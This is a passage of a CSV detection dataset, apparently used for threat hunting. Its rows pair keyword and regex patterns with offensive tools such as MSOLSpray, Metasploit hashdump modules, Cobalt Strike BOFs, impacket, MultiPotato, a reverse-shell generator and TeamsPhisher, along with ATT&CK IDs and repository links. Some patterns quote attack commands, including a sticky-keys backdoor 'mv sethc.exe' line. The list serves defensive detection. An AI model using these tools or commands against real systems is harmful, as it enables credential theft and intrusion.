(Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","9","827","159","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z" "*mspass.exe*",".{0,1000}mspass\.exe.{0,1000}","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*mspass.zip*",".{0,1000}mspass\.zip.{0,1000}","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. 
You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*msquic_openssl/msquic.dll*",".{0,1000}msquic_openssl\/msquic\.dll.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*msquic_openssl/msquic.lib*",".{0,1000}msquic_openssl\/msquic\.lib.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*MS-RPNVulnerableDC.txt*",".{0,1000}MS\-RPNVulnerableDC\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*MS-RPRN.exe *",".{0,1000}MS\-RPRN\.exe\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation From attacking machine entice the Domain Controller to connect using the printer bug. 
Binary from here https://github.com/leechristensen/SpoolSample","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*MS-RPRN.exe \\* \\*/pipe/pwned*",".{0,1000}MS\-RPRN\.exe\s\\\\.{0,1000}\s\\\\.{0,1000}\/pipe\/pwned.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*mssgbox_shellcode_arranged_x64.b64*",".{0,1000}mssgbox_shellcode_arranged_x64\.b64.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_exitfunc_thread_x64.bin*",".{0,1000}mssgbox_shellcode_exitfunc_thread_x64\.bin.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_x64.b64*",".{0,1000}mssgbox_shellcode_x64\.b64.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by 
loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_x64.bin*",".{0,1000}mssgbox_shellcode_x64\.bin.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_x64_with_hexsymbol.txt*",".{0,1000}mssgbox_shellcode_x64_with_hexsymbol\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" 
"*mssgbox_shellcode_x64_without_hexsymbol.txt*",".{0,1000}mssgbox_shellcode_x64_without_hexsymbol\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mssql_brute.rc*",".{0,1000}mssql_brute\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mssql_local_auth_bypass.*",".{0,1000}mssql_local_auth_bypass\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mssql_local_hashdump.rb*",".{0,1000}mssql_local_hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mssqlattack.py*",".{0,1000}mssqlattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*mssqlattack.py*",".{0,1000}mssqlattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*mssqlproxy-master*",".{0,1000}mssqlproxy\-master.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","8","704","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*mssqlrelayclient.*",".{0,1000}mssqlrelayclient\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*mssqlrelayclient.py*",".{0,1000}mssqlrelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*mssqlsvc.kirbi*",".{0,1000}mssqlsvc\.kirbi.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential 
Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mthbernardes*rsg*",".{0,1000}mthbernardes.{0,1000}rsg.{0,1000}","offensive_tool_keyword","rsg","A tool to generate various ways to do a reverse shell","T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007","TA0002 - TA0011 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/mthbernardes/rsg","1","1","N/A","N/A","6","551","127","2024-02-29T16:28:28Z","2017-12-12T02:57:07Z" "*mttaggart/OffensiveNotion*",".{0,1000}mttaggart\/OffensiveNotion.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*mtth-bfft/adeleg*",".{0,1000}mtth\-bfft\/adeleg.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*mufeedvh/moonwalk*",".{0,1000}mufeedvh\/moonwalk.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*multi_meter_inject.rb*",".{0,1000}multi_meter_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*multi_vendor_cctv_dvr_pass*",".{0,1000}multi_vendor_cctv_dvr_pass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*multibit2john.py*",".{0,1000}multibit2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*MultiPotato.cpp*",".{0,1000}MultiPotato\.cpp.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*MultiPotato.exe*",".{0,1000}MultiPotato\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*MultiPotato-main*",".{0,1000}MultiPotato\-main.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*--mutator N*",".{0,1000}\-\-mutator\sN.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and 
servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*mutator.py *",".{0,1000}mutator\.py\s.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*mv ""/media/windows/Windows/System32/sethc.exe"" ""/media/windows/Windows/System32/*",".{0,1000}mv\s\""\/media\/windows\/Windows\/System32\/sethc\.exe\""\s\""\/media\/windows\/Windows\/System32\/.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*mv *.ccache *.ccache*",".{0,1000}mv\s.{0,1000}\.ccache\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*mvelazc0/BadZure*",".{0,1000}mvelazc0\/BadZure.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation 
Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*mwrlabs*",".{0,1000}mwrlabs.{0,1000}","offensive_tool_keyword","Github Username","used to be a malware repo also hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mwrlabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*-my.sharepoint.com/personal/Fakeuser*",".{0,1000}\-my\.sharepoint\.com\/personal\/Fakeuser.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","6","553","72","2024-04-05T17:19:50Z","2019-03-05T08:54:38Z" "*-my.sharepoint.com/personal/TESTUSER_*",".{0,1000}\-my\.sharepoint\.com\/personal\/TESTUSER_.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","6","553","72","2024-04-05T17:19:50Z","2019-03-05T08:54:38Z" "*my_dump_my_pe*",".{0,1000}my_dump_my_pe.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*MY_MESSAGE ""I did it for the vine.""*",".{0,1000}MY_MESSAGE\s\""I\sdid\sit\sfor\sthe\svine\.\"".{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*MyMeterpreter.ps1*",".{0,1000}MyMeterpreter\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - 
T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*myreallycooltotallyrealtenant.onmicrosoft.com*",".{0,1000}myreallycooltotallyrealtenant\.onmicrosoft\.com.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*myseatbelt.py*",".{0,1000}myseatbelt\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*mysql -u* -p c2 < c2_sample.sql*",".{0,1000}mysql\s\-u.{0,1000}\s\-p\sc2\s\<\sc2_sample\.sql.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*mysql_authbypass_hashdump.rb*",".{0,1000}mysql_authbypass_hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mysql_file_enum.rb*",".{0,1000}mysql_file_enum\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mysql_hashdump.rb*",".{0,1000}mysql_hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mysql-privesc-race.c*",".{0,1000}mysql\-privesc\-race\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege 